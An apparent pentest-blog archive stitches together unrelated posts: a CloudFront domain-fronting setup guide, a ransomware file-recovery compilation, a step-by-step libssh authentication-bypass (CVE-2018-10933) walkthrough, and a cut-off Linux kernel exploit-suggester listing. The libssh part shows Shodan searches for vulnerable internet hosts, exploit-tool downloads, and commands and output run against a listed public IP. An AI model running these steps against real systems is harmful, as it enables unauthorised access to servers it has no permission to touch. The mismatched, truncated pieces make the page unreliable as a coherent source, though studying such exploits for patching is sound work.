Articles by "Pentest"



Broadly speaking, we can say that the fronting technique consists of obfuscating the data source of a site.
This is something that has existed for a long time, but lately it has regained relevance due to the barriers that have been raised on the internet to censor, filter and prevent access to certain content, generally for political or ideological reasons.
Fronting works at the application layer and allows users to access content that has been blocked by the most common techniques: IP blocking, DNS filtering and even packet inspection, since the headers of those packets are those of an authorized origin, and the actual content is only revealed once the connection has been authorized and established. It should be noted that fronting only works over HTTPS.
There are many tutorials on the internet about how to use the CDN (Content Delivery Network) in Amazon Web Services to serve content from different sources in case one of them is offline. However, we have not found explanations of how to do this when the data source is not a site hosted on AWS, which is why we decided to write this guide.

In our example we will use the following names: 



subdomain.domain.com : our subdomain, with which we will do the obfuscation
www.otrodominio.com/ruta/al/subdominio : the origin of the data that we will show on subdomain.domain.com

The first thing we must do is enable fronting in the hosting of otrodominio.com, since in most hosts it is disabled by default to avoid phishing. (Later we will publish a guide on how to know whether your domain is vulnerable to fronting by malicious users.)
I cannot tell you in detail how to enable fronting in your hosting, as it is different in each one. In any case, you can always check with the provider's support team.

Then we must go to AWS and create a CNAME for subdomain.domain.com. For now it does not matter where it points, since we'll change it later. We go to Route53, select our zone and create a new record with "Create Record Set":

Here we select CNAME as the type, put our subdomain as the name and anything as the value, for example www.google.com:


Then we go to Cloudfront and create a new distribution:


We select the Web option and enter the domain of the data source and the path, if there is one.
We enter the alternative name we chose for the data source and select the type of certificate. In this case, we chose a public one generated by Amazon for our domain:

We accept and, while the distribution is being created (this takes about 20 minutes), we note the CloudFront name generated for it. It is a name of the form a1b2c3d4c5.cloudfront.net.
We copy it, go back to the CNAME we created before and replace whatever we had put there (in this example, www.google.com) with this new domain.

Finally, we connect by SSH to the AWS host with the method we have configured (certificate .pem file, user and password, etc.) and, depending on the version of Apache installed, navigate to /etc/apache2/ and edit apache2.conf, or go to /etc/apache2/sites-available/ and edit domain.com.conf (the name will be that of your domain), and add the following lines:
 
# Requires mod_proxy, mod_proxy_http and mod_ssl (a2enmod proxy proxy_http ssl)
<VirtualHost *:80>
        ServerName subdomain.domain.com
        # Needed because the backend is reached over HTTPS
        SSLProxyEngine On
        # Forward every request to the origin path (trailing slashes on both sides)
        ProxyPass / https://www.otrodominio.com/ruta/al/subdominio/
        ProxyPassReverse / https://www.otrodominio.com/ruta/al/subdominio/
</VirtualHost>
 
With this we make sure that whatever the user requests from subdomain.domain.com arrives over HTTPS at www.otrodominio.com/ruta/al/subdominio.

Finally, once CloudFront has finished creating the distribution (the status will change to Deployed and will no longer say In Progress), we can test the fronting by typing subdomain.domain.com/index.php, or a path that only exists under www.otrodominio.com/ruta/al/subdominio/, for example www.otrodominio.com/ruta/al/subdominio/otra/ruta/test.php. We enter subdomain.domain.com/otra/ruta/test.php and voilà! There is our content from otrodominio.com, and the URL the browser shows us is subdomain.domain.com!

Ransomware-shl
For several days, many people had been contacting me to ask how to recover files infected by ransomware, so I decided to write this post to explain how to perform the process and recover your files. First of all, I should clarify that I have not had any experience with this type of virus; this post is a compilation of the best posts, which are taken from recognized sites and will be in italics, with the original links in the heading of each section. My own text and personal opinions will be in this font.
What is Ransomware? Ransomware is malicious software that, by infecting our computer, gives the cybercriminal the ability to block the PC from a remote location and encrypt our files, taking control of all stored information and data. To unlock it, the virus shows a pop-up window asking us to pay a ransom.
Example image of a PC infected by Ransonware:
 
How does Ransomware work? 
1) It is camouflaged inside another file or program that is desirable to the user and invites a click: attachments in emails, videos on pages of doubtful origin, or even system updates and programs that are in principle reliable, such as Windows or Adobe Flash.
2) Once it has penetrated the computer, the malware activates, causes the entire operating system to be blocked and sends the warning message with the threat and the amount of the "ransom" that has to be paid to recover all the information. The message may vary depending on the type of ransomware we face: pirated content, pornography, fake virus...
3) To increase the uncertainty and fear of the victim, the threat sometimes includes the IP address, the Internet provider and even a photograph captured from the webcam.
 How to avoid Ransomware? The practices to avoid being infected by this malware are common to those that we must follow to avoid other viruses.
- Keep our operating system updated to avoid security flaws.
- Have a good antivirus product installed and always keep it updated.
- Do not open emails or files with unknown senders.
- Avoid browsing unsafe pages or with unverified content.

Ransomware in Windows.

This guide provides instructions and a link to download and use the latest Trend Micro Ransomware File Decryptor tool to try to decrypt files encrypted by certain types of ransomware. As an important reminder, the best protection against ransomware is preventing it from ever reaching your system. While Trend Micro is constantly working to update our tools, ransomware programmers are also constantly changing their methods and tactics, which can make older versions of tools like this obsolete over time. Customers are recommended to follow these safety practices:
1) Make sure you have regular backups of the most important and critical data, offline or in the cloud.
2) Make sure that you are always applying the latest critical updates and patches for your operating system and other key system software (e.g. browsers).
3) Install the latest versions and configurations of the best security tools, such as Trend Micro, to provide multi-layer security.
Types of Ransomware supported.
The following table shows the ransomware versions supported by this tool.
Extension of the encrypted file
1. Click the Download button to get the latest version of the Trend Micro Ransomware File Decryptor tool (RansomwareFileDecryptor or TeslacryptDecryptor). Uncompress (unzip) it and then run RansomwareFileDecryptor.exe or TeslacryptDecryptor.exe.
2. After running it, accept the license to proceed.
3. After accepting the license, follow step by step what the tool tells you.

Anti-Ransomware

Due to the advanced encryption used by this particular crypto-ransomware, only partial data decryption is currently possible for files affected by CryptXXX V3.
The tool will try to repair certain file formats after the decryption attempt, including DOC, DOCX, XLS, XLSX, PPT and PPTX (common Microsoft Office formats).
The fixed file will have the same name as the original file with "_fixed" appended, and will be placed in the same location. When you open the fixed file with Microsoft Office, it may prompt you to try to repair the file again, and this process may be able to recover the document.
Keep in mind that, due to the different versions and particular behaviours of Microsoft Office files, this method does not guarantee that the document will be completely recovered. For other files, after partial data decryption users may have to use a third-party corrupted-file recovery tool (such as the open source program JPEGsnoop) to try to recover the entire file.
An example would be a photo or image file that was partially recovered and shows parts of the image, but not the whole image. The user can then decide whether the file is important enough to use a third-party tool or to request the assistance of a professional file recovery service.
Image before being infected:

Image after recovery:

Linux Ransomware

Windows is the most used operating system on the whole network, so most developers, like hackers, usually release their applications for this system. However, little by little the market share of Linux, especially in professional environments and servers, continues to grow, which increasingly draws the attention of attackers who want to take advantage of this operating system.
Ransomware is one of the most dangerous types of malware of recent times. When this malware infects a user it automatically begins to encrypt all of their data, so that the only way to recover it is by paying a "ransom", without any guarantee that, even if we pay these pirates, we will receive the decryption key.
Until now, this type of malware only affected Windows users, who already had a hard enough time defending themselves against this threat, since it is difficult to identify and eliminate even with the main antivirus signatures; however, it is possible that Windows users are no longer the only ones affected.
Doctor Web, an important Russian security company, has detected the first ransomware threat for Linux users, focused especially on infecting and hijacking the servers used to host web pages. This threat, named Linux.Encoder.1 by the security company, is written in C and uses the PolarSSL library to establish secure connections that are impossible to capture; it then installs itself as a system service, or daemon, before starting its dreaded function.
How does this Ransomware work?
Once running on the system, this new malware scans the file system looking for all the directories commonly used for the development and hosting of web pages. Once they are found, it begins to encrypt all the files hosted there, along with all the documents, personal files and multimedia files found on the computer or server. For encryption it uses the AES-CBC-128 algorithm.
When it finishes its task it creates a text file with the instructions needed to recover the files, as well as the payment address and the amount to pay, which in this case is 1 Bitcoin.
Reach of this ransomware.
Home users are also at risk from this ransomware.
Although the main targets of this ransomware are web servers, users are not free from danger. According to security experts, this malware can easily be ported to infect and attack all types of equipment, for example NAS devices, which are increasingly common in domestic environments as a server or network mass storage system.
Luckily, not everything is as simple as it seems. Thanks to the Linux permissions system, running this malware on a Linux server or computer requires root permissions, so if we keep the superuser account under control it is easier to avoid being affected by this malware, unless it takes advantage of a privilege escalation vulnerability or is run manually with those permissions.
How to recover my files in Linux?
Bitdefender is the first security provider to release a decryption tool that automatically restores the affected files to their original state. The tool determines the IV and the encryption key just by analysing the file, then performs decryption, followed by permission fixing. If you can boot the compromised operating system, download the script and run the program as the root user.
To download the tool and learn how to run it, we invite you to read this Bitdefender post.
We must clarify that after your system has been infected by the ransomware, it is advisable to take a backup of your data and format the system to be sure the virus is no longer on the PC. After restoring your data to the new system, it is recommended to scan it with your antivirus software.

Recommendations:

1) Try to create restore points and backup copies of your files at least twice a week.
2) Be cautious when running a program or script; only do it if the site of origin is trustworthy.
3) Use good antivirus software (if you are a Windows user), such as Kaspersky, ESET NOD32 Smart Security and ClamAV (RECOMMENDED), since the latter is also available for GNU/Linux and is open source.
4) Use Firefox and follow the browsing techniques of these posts: How to browse anonymously without being tracked and Privacy and security on the network.
5) In addition to the aforementioned tools, we can use these other tools that have the same purpose, in case the previous one does not give us the expected results:
   Petya
6) Use GNU/Linux as the operating system.
LIBSSH BACKGROUND
Computers all over the globe rely on the libssh library. The issue with this is the disclosure of bug CVE-2018-10933. Unfortunately for hackers, this server bug was patched shortly after the disclosure. Fortunately for hackers, however, barely anyone takes the time to update their SSH libraries.
How the Exploit Works
In a traditional SSH session, the user can choose to log in with a username and password, and depending on whether or not the credentials are valid, the server will accept or reject the connection. In the example below, we attempt to log in to a server running libssh with the wrong password by typing ssh username@ipaddress into a terminal window.
ssh root@159.180.132.163
The authenticity of host '159.180.132.163 (159.180.132.163)' can't be established.
RSA key fingerprint is SHA256:Vkx9gDp1E/df1Yn0bDrgXIIYcTnyCVU6vmgqLKKqrhQ.
Are you sure you want to continue connecting (yes/no)? yes
Warning: Permanently added '159.180.132.163' (RSA) to the list of known hosts.
root@159.180.132.163's password:
Permission denied, please try again.
root@159.180.132.163's password:
Permission denied, please try again.
root@159.180.132.163's password:
root@159.180.132.163: Permission denied (publickey,keyboard-interactive,password).
Because we don't know the password, the attempt to connect is rejected, and we are kept out of the server. On top of this, we are banned from connecting to that server for some time if we try to log in too many times and fail.
In versions of libssh with the bug in question, a user can trick the system into thinking they're already authenticated by sending an unexpected message indicating the connection already succeeded, bypassing the need to supply a password. It permits an attacker to gain complete control over the affected system with no knowledge of the password, and it represents a critical vulnerability in any system with affected versions of libssh.

So How Does This Bug Work?
Imagine if you could gain access to a stranger's house just by telling them you live there. In this trick, we skip the process of proving we belong with a password and instead send a "success" message.

This bug works when an attacker doesn't attempt to log in the traditional way at all, and instead sends the server a message that appears to confirm that the attacker has already authenticated. This "authentication succeeded" message confuses the server into granting access without a password, wholly bypassing the conventional security of the system.

Step 1: INSTALL TOOLS AND DEPENDENCIES

The first program we'll use to scan for vulnerable devices is called Nmap, which can easily be installed. On Kali, it should be there by default, but if it's not, you can quickly download it with the following command.
apt install nmap
In order to find out whether a device we discover is vulnerable, we'll be using the Python program libssh-scanner. It is written in Python 2.7, so if you only have Python 3 installed, you'll need to make sure to also install Python 2.7.

To install libssh-scanner, you need to clone the libssh-scanner repository by typing the following into a terminal window.
git clone https://github.com/leapsecurity/libssh-scanner.git
Then, after navigating into the directory and listing its contents, you need to install the required libraries by running the pip command seen below.

cd libssh-scanner
ls
pip install -r requirements.txt
Next, you also need to install the program that performs the attack. This time, you're cloning the "libSSH-Authentication-Bypass" repository and installing any dependencies using the following commands.
git clone https://github.com/purplesec/libSSH-Authentication-Bypass.git
cd libSSH-Authentication-Bypass
pip install -r requirements.txt
Step 2: USE NMAP TO SCAN FOR VULNERABILITIES
The first step to fixing or exploiting a vulnerable device is finding it, and it's comparatively simple to find devices on your local network that may need attention. To do so, we'll use a program called Nmap to find devices running an SSH server and determine whether libssh is running on them. Nmap is an essential tool in any hacker's toolkit, enabling one to quickly scan and see all hosts and services on a given network or IP range.
In this case, we'll scan the devices connected locally to our network, and Nmap will tell us whether or not each device on the network is using a vulnerable version of libssh. To follow this guide, you'll need to install Nmap, but if you use Kali Linux, you most likely already have it installed.
To scan and find all devices on the local network using libssh, open a terminal window and enter the following nmap command.
nmap -sV -p22 192.168.0.0/24
Breaking down the command, nmap tells the computer that we want to start using Nmap, while -sV tells Nmap that we want to perform a service scan, which grabs the banner of any service running on an open port. The flag -p22 tells Nmap to only scan port 22, which is the standard port for SSH communication. While this won't find devices that use SSH on a different port, it will dramatically reduce scan times.
Finally, the target is expressed as a subnet range; the first three bytes will be specific to your network. When scanning a range of computers instead of only one, the 0/24 at the end is essential for scanning the complete subnet. If you need to find your subnet range, you can use a tool like "ipcalc", which will calculate it for you. To do so, find your IP address by typing ifconfig, then type ipcalc yourIP (replacing "yourIP" with your IP address).
The command will return a list of devices connected to the subnet, as well as some information gathered from the scanned port. In this case we are looking for any targets that are using a version of libssh earlier than 0.7.6. You can expect to see output like the one below.
Nmap scan report for 172.16.42.1
Host is up (0.0098s latency).

PORT   STATE  SERVICE VERSION
22/tcp closed ssh

Nmap scan report for 172.16.42.32
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)

Nmap scan report for 172.16.42.53
Host is up (0.079s latency).

PORT   STATE  SERVICE VERSION
22/tcp closed ssh

Nmap scan report for 172.16.42.67
Host is up (0.024s latency).

PORT   STATE    SERVICE VERSION
22/tcp filtered ssh
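As an added example (not part of the original post and not code from libssh-scanner), the following Python script parses nmap -sV output of the shape shown above and flags every host whose libssh banner is older than 0.7.6, the release the post gives as the fix, so an administrator can build a patch list from an inventory scan. The sample scan text is constructed, not a real scan, and the version check works on raw "SSH-2.0-libssh-x.y.z" banners too.

```python
"""Flag hosts whose nmap -sV banner shows libssh older than 0.7.6 (the fixed release)."""
import re
from typing import Dict, List, Optional, Tuple

FIXED_VERSION = (0, 7, 6)  # first libssh release not affected by CVE-2018-10933

# Constructed nmap -sV excerpt with the same layout as the scan output in the post.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 172.16.42.1
Host is up (0.0098s latency).

PORT   STATE  SERVICE VERSION
22/tcp closed ssh

Nmap scan report for 172.16.42.32
Host is up (0.21s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     libssh 0.7.2 (protocol 2.0)

Nmap scan report for 172.16.42.67
Host is up (0.024s latency).

PORT   STATE    SERVICE VERSION
22/tcp open     ssh     libssh 0.8.1 (protocol 2.0)

Nmap scan report for 172.16.42.90
Host is up (0.011s latency).

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.4 (protocol 2.0)
"""

HOST_RE = re.compile(r"^Nmap scan report for (\S+)")
PORT_RE = re.compile(r"^22/tcp\s+open\s+ssh\s+(.*)$")
# Matches both "libssh 0.7.2" (nmap service string) and "SSH-2.0-libssh-0.7.2" (raw banner).
LIBSSH_RE = re.compile(r"libssh[-_ ]?(\d+)\.(\d+)\.(\d+)", re.IGNORECASE)


def parse_version(text: str) -> Optional[Tuple[int, int, int]]:
    """Extract a libssh x.y.z version from a service string or SSH banner; None if absent."""
    m = LIBSSH_RE.search(text)
    if not m:
        return None
    return tuple(int(x) for x in m.groups())


def needs_patch(version: Tuple[int, int, int]) -> bool:
    """True when the version predates the fixed release (tuple compare, so 0.7.10 > 0.7.6)."""
    return version < FIXED_VERSION


def parse_nmap(output: str) -> Dict[str, Optional[str]]:
    """Map each scanned host to its service string on an open port 22 (None if closed/filtered)."""
    hosts: Dict[str, Optional[str]] = {}
    current = None
    for line in output.splitlines():
        h = HOST_RE.match(line)
        if h:
            current = h.group(1)
            hosts[current] = None
            continue
        p = PORT_RE.match(line)
        if p and current:
            hosts[current] = p.group(1).strip()
    return hosts


def hosts_to_patch(output: str) -> List[Tuple[str, str]]:
    """Return (host, version) for every host advertising a libssh older than 0.7.6."""
    flagged = []
    for host, service in parse_nmap(output).items():
        if not service:
            continue  # port 22 closed or filtered: nothing to inspect
        v = parse_version(service)
        if v and needs_patch(v):
            flagged.append((host, ".".join(map(str, v))))
    return flagged


if __name__ == "__main__":
    for host, ver in hosts_to_patch(SAMPLE_NMAP_OUTPUT):
        print(f"{host}: libssh {ver} predates 0.7.6, schedule an update")
```

Run it against the saved output of `nmap -sV -p22 <subnet> -oN scan.txt` by reading that file instead of the constructed sample.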

Step 3: DISCOVER LIBSSH VULNERABLE SERVERS
The vast majority of vulnerable servers are accessible via a remote network, so we'll need to search in a different way to find devices not connected directly to our LAN.
To find a remote target, you'll need to make use of a service known as Shodan, a search engine that can find any device connected to the internet, unlike Google, which only returns results from web servers on port 80. For example, instead of directing you to a website attempting to sell you security cameras, Shodan will direct you to the login page of functioning IP cameras, potentially granting you access to the camera if the default password is unchanged.
Shodan will have indexed several vulnerable SSH servers, which we can search for both by port number and by other keywords that reveal hosts running versions of libssh before 0.7.6, which we know to be affected by the vulnerability.
To start, register for a free account, which allows you to look at the first two pages of any search query, or about 20 unique devices. Then, to find servers vulnerable to the libssh exploit, you'll need three terms in the search:
  • port:22 , which is the default port for the SSH protocol. Even though SSH can be moved to any unused port, this isn't too common, because all it really does is prevent the server from being found with a simple scan for port 22.
  • LibSSH , which returns any server that advertises using the libssh library, indicating that it is potentially exploitable.
  • 0.7.* , which limits the results to devices using versions of libssh that begin with "0.7." and excludes more up-to-date versions from the results. While you'll still get some results that are patched, you'll eliminate most of the more updated devices with this filter.
The search above will return a list of IP addresses that may be vulnerable to this attack, along with some more information that Shodan was able to retrieve. Shodan's information will include a banner pull, the location of the device, the latest activity, and the organization in control of the server.


Step 4: TESTING LIBSSH VULNERABILITY ON SERVER
Once you've gathered a list of targets susceptible to the exploit, either local or remote, you can use "libssh-scanner" to scan target IP addresses and determine whether they're still likely vulnerable. Other tools will go even further and try to establish a shell, but it's important to note that accessing another device using SSH without permission may violate the Computer Fraud and Abuse Act. Depending on who owns the device you access, this could land you in serious legal trouble.
In addition to legal issues, you should be wary of connecting from your real IP address to devices that might be purposely vulnerable to this exploit. Honeypots are often created this way to attract amateur hackers, and you could end up inside a device configured as a trap.
Now, use libssh-scanner to see whether the targets gathered in steps 2 and 3 are really vulnerable to the exploit. To do this, create a TXT file containing all of the IP addresses found in steps 2 and 3, with each IP address on its own line. Name this text file "ips1.txt" and place it in the same folder that libssh-scanner was downloaded to earlier in step 1.
Once within the directory, enter the following command into a terminal window.
python libsshscan.py --port 22 --aggressive ips1.txt
The command will run under Python 2.7, scan every IP address in the text file, and determine whether the target is really vulnerable to the CVE-2018-10933 security flaw. As you can see below, performing the scan narrowed down the list of potential targets from Shodan to only one, 159.180.132.163.
python libsshscan.py --aggressive --port 22 ips1.txt
libssh scanner 1.0.4

Searching for Vulnerable Hosts...
* 52.151.63.100:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.2')
* 13.57.20.28:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* 132.206.51.74:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* 18.221.40.109:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* 52.1.165.128:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* 54.86.221.162:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* 52.173.202.21:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
* 54.193.60.245:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
! 159.180.132.163:22 is likely VULNERABLE to authentication bypass (b'SSH-2.0-libssh-0.7.2')
* 34.194.133.107:22 is not vulnerable to authentication bypass (b'SSH-2.0-libssh-0.7.0')
Scanner Completed with success
To check the one result, use libSSH-Authentication-Bypass to test the attack. Change directory into the folder you downloaded libSSH-Authentication-Bypass to previously in step 1, and enter the following command, replacing "159.180.132.163" with the IP address you want to scan.
python3 libsshauthbypass.py --host 159.180.132.163
The command returns the following output on a server that has been partially patched but is still vulnerable to the authentication bypass.
python3 bypasswithfakekey.py --host 159.180.132.163
DEBUG:paramiko.transport:starting thread (client mode): 0x74a0d30
DEBUG:paramiko.transport:Local version/idstring: SSH-2.0-paramiko_2.0.8
DEBUG:paramiko.transport:Remote version/idstring: SSH-2.0-libssh-0.7.2
INFO:paramiko.transport:Connected (version 2.0, client libssh-0.7.2)
DEBUG:paramiko.transport:kex algos:['diffie-hellman-group14-sha1', 'diffie-hellman-group1-sha1'] server key:['ssh-rsa'] client encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] server encrypt:['aes256-ctr', 'aes192-ctr', 'aes128-ctr', 'aes256-cbc', 'aes192-cbc', 'aes128-cbc', 'blowfish-cbc', '3des-cbc'] client mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] server mac:['hmac-sha2-256', 'hmac-sha2-512', 'hmac-sha1'] client compress:['none', 'zlib', 'zlib@openssh.com'] server compress:['none', 'zlib', 'zlib@openssh.com'] client lang:[''] server lang:[''] kex follows?False
DEBUG:paramiko.transport:Kex agreed: diffie-hellman-group1-sha1
DEBUG:paramiko.transport:Cipher agreed: aes128-ctr
DEBUG:paramiko.transport:MAC agreed: hmac-sha2-256
DEBUG:paramiko.transport:Compression agreed: 
If you see a message indicating the connection is successful, then you've confirmed the vulnerability on the device you're testing. If the connection fails, or you see a partially successful result like the one above, then you've confirmed that the issue doesn't affect the target (even though it may need to be updated anyway if you get a partial success).


This program, run without arguments, will perform 'uname -r' to grab the Linux kernel release version and return a suggestive list of possible exploits. Nothing fancy, so a patched or back-ported kernel may fool this script.
This script has been extremely useful on site and in exams.
Usage (pass a kernel version with -k to list root privilege escalation opportunities on a Linux machine):
perl ./Linux_Exploit_Suggester.pl -k 4.11.7

Sample Output

$ perl ./Linux_Exploit_Suggester.pl -k 2.6.28

Kernel local: 2.6.28

Possible Exploits:
[+] sock_sendpage2
   Alt: proto_ops    CVE-2009-2692
   Source: http://www.exploit-db.com/exploits/9436
[+] half_nelson3
   Alt: econet    CVE-2010-4073
   Source: http://www.exploit-db.com/exploits/17787/
[+] reiserfs
   CVE-2010-1146
   Source: http://www.exploit-db.com/exploits/12130/
[+] pktcdvd
   CVE-2010-3437
   Source: http://www.exploit-db.com/exploits/15150/
[+] american-sign-language
   CVE-2010-4347
   Source: http://www.securityfocus.com/bid/45408/
[+] half_nelson
   Alt: econet    CVE-2010-3848
   Source: http://www.exploit-db.com/exploits/6851
[+] udev
   Alt: udev <1.4.1    CVE-2009-1185